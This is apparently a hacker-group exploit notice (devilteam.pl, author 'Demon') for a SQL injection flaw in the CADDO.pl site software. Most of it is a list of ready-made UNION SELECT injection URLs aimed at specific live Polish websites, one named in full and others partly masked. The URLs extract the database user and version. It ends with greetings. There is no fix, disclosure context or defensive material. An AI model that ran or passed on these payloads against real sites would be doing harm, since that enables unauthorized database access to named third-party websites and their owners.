#############
#
# sql injection bug by Demon
#
# devilteam.pl
#
#############
# Title : wykonanie CADDO.pl <= SQLi
# Producent: caddo.pl
# Author : Demon
# Tested on : ubuntu 10.10
#Exploits:
php?pid=[sql]
http://offartstudio.pl/cykl.php?pid=-2 union select user()--
&...id=[sql]
http://www.preXXXXoda.pl/oferta.php?of=pielegnacja-dloni-i-stop&kat_id=-3 union select 1,2,3,4,5,6,7,user(),9,10--
http://wXXXm.org.pl/wykonawstwo.php?t=budowa-i-montaz-wezlow-cieplnych&id=-2 union select 1,2,user(),version(),5--
http://www.fiXXXXus.pl/artykuly.php?akt=biofeedback&art_id=-7 union select 1,user(),3,version(),5,6--
http://www.caXXXXo.pl/portfolio.php?internet=strony-internetowe&pkat_id=-5 union select 1,2,user(),4,version(),6,7,8,9,10--
######################
Gretzy:
Devilteam.pl
Extra Gretzy :Mojej kobiecie za Wyrozumialosc
######################
Serdecznie olewam tych, ktorzy mysla ,ze sa moimi przyjaciolmi!